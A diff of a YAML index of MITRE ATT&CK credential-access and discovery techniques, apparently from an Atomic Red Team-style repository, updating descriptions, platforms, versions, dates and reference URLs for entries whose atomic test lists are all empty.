         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -48263,8 +48982,6 @@ credential-access:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 discovery:
   T1033:
@@ -48329,12 +49046,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1033
     atomic_tests: []
   T1613:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:08:50.706Z'
       name: Container and Resource Discovery
       description: "Adversaries may attempt to discover containers and other resources
         that are available within a containers environment. Other resources may include
@@ -48393,7 +49109,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1613
     atomic_tests: []
   T1016.001:
@@ -48414,7 +49129,7 @@ discovery:
       - source_name: mitre-attack
         external_id: T1016.001
         url: https://attack.mitre.org/techniques/T1016/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-25T17:03:26.632Z'
       name: 'System Network Configuration Discovery: Internet Connection Discovery'
       description: |-
         Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
@@ -48435,13 +49150,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1016.001
     atomic_tests: []
   T1069:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:03:06.294Z'
       name: Permission Groups Discovery
       description: |-
         Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -48464,15 +49177,14 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Group: Group Metadata'
@@ -48498,13 +49210,12 @@ discovery:
         url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1069.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:51:35.759Z'
       name: Cloud Groups
       description: |-
         Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -48529,12 +49240,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -48576,13 +49286,12 @@ discovery:
         url: https://github.com/True-Demon/raindance
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1615:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-01-06T12:41:08.579Z'
       name: Group Policy Discovery
       description: |-
         Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -48643,12 +49352,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1615
     atomic_tests: []
   T1652:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:07:16.804Z'
       name: Device Driver Discovery
       description: |-
         Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -48712,19 +49420,18 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1652
     atomic_tests: []
   T1087.002:
     technique:
-      modified: '2024-04-15T21:33:57.732Z'
+      modified: '2024-05-31T04:00:37.651Z'
       name: 'Account Discovery: Domain Account'
       description: "Adversaries may attempt to get a listing of domain accounts. This
         information can help adversaries determine which domain accounts exist to
         aid in follow-on behavior such as targeting specific accounts which possess
         particular privileges.\n\nCommands such as <code>net user /domain</code> and
         <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039)
-        utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code>
+        utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code>
         on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
         cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code>
         may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
@@ -48771,7 +49478,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.002
     atomic_tests: []
   T1087.001:
@@ -48838,12 +49544,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.001
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -48933,18 +49638,17 @@ discovery:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1069.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:16:47.754Z'
       name: 'Permission Groups Discovery: Domain Groups'
       description: |-
         Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -48987,12 +49691,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.002
     atomic_tests: []
   T1007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:55:18.326Z'
       name: System Service Discovery
       description: |-
         Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
@@ -49033,12 +49736,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1007
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -49123,7 +49825,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1135:
@@ -49185,12 +49886,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1135
     atomic_tests: []
   T1120:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:41.575Z'
       name: Peripheral Device Discovery
       description: 'Adversaries may attempt to gather information about attached peripheral
         devices and components connected to a computer system.(Citation: Peripheral
@@ -49241,12 +49941,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1120
     atomic_tests: []
   T1082:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:42:22.247Z'
       name: System Information Discovery
       description: |-
         An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49257,7 +49956,6 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Maril Vernon @shewhohacks
       - Praetorian
@@ -49272,7 +49970,6 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - IaaS
@@ -49320,7 +50017,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1082
     atomic_tests: []
   T1016.002:
@@ -49392,12 +50090,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016.002
     atomic_tests: []
   T1010:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:22:56.372Z'
       name: Application Window Discovery
       description: |-
         Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49439,122 +50136,73 @@ discovery:
       - source_name: Prevailion DarkWatchman 2021
         description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
           new evolution in fileless techniques. Retrieved January 10, 2022.'
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1010
     atomic_tests: []
   T1087.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
-      type: attack-pattern
-      created: '2020-02-21T21:08:33.237Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.003
-        url: https://attack.mitre.org/techniques/T1087/003
-      - source_name: Microsoft Exchange Address Lists
-        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
-        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
-          Retrieved March 26, 2020.
-      - source_name: Microsoft getglobaladdresslist
-        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
-        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
-          2019.
-      - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
-          Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
-        source_name: Black Hills Attacking Exchange MailSniper, 2016
-      - source_name: Google Workspace Global Access List
-        url: https://support.google.com/a/answer/166870?hl=en
-        description: Google. (n.d.). Retrieved March 16, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-17T20:35:35.125Z'
       name: Email Account
       description: |-
         Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
 
-        In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+        In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
 
         In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
         Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1497.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
       type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
+      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+      created: '2020-02-21T21:08:33.237Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1087/003
+        external_id: T1087.003
+      - source_name: Black Hills Attacking Exchange MailSniper, 2016
+        description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+          Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+      - source_name: Google Workspace Global Access List
+        description: Google. (n.d.). Retrieved March 16, 2021.
+        url: https://support.google.com/a/answer/166870?hl=en
+      - source_name: Microsoft Exchange Address Lists
+        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+          Retrieved March 26, 2020.
+        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+      - source_name: Microsoft getglobaladdresslist
+        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+          2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1497.003:
+    technique:
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -49569,6 +50217,12 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -49578,9 +50232,14 @@ discovery:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -49590,102 +50249,137 @@ discovery:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1580:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Cloud Infrastructure Discovery
+      description: |-
+        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Regina Elwell
       - Praetorian
       - Isif Ibrahima, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+        components. Monitor logs for actions that could be taken to gather information
+        about cloud infrastructure, including the use of discovery API calls by new
+        or unexpected users and enumerations from unknown or malicious IP addresses.
+        To reduce false positives, valid change management procedures could introduce
+        a known identifier that is logged with the change (e.g., tag or header) if
+        supported by the cloud provider, to help distinguish valid, expected actions
+        from malicious ones.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Instance: Instance Enumeration'
+      - 'Cloud Storage: Cloud Storage Enumeration'
+      - 'Volume: Volume Enumeration'
+      - 'Snapshot: Snapshot Enumeration'
       type: attack-pattern
       id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
       created: '2020-08-20T17:51:25.671Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1580
         url: https://attack.mitre.org/techniques/T1580
+        external_id: T1580
       - source_name: Expel IO Evil in AWS
-        url: https://expel.io/blog/finding-evil-in-aws/
         description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
           Evil in AWS. Retrieved June 25, 2020.
+        url: https://expel.io/blog/finding-evil-in-aws/
       - source_name: AWS Head Bucket
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
         description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
           14, 2022.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
       - source_name: AWS Get Public Access Block
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
       - source_name: AWS Describe DB Instances
-        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
       - source_name: Amazon Describe Instance
-        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
         description: Amazon. (n.d.). describe-instance-information. Retrieved March
           3, 2020.
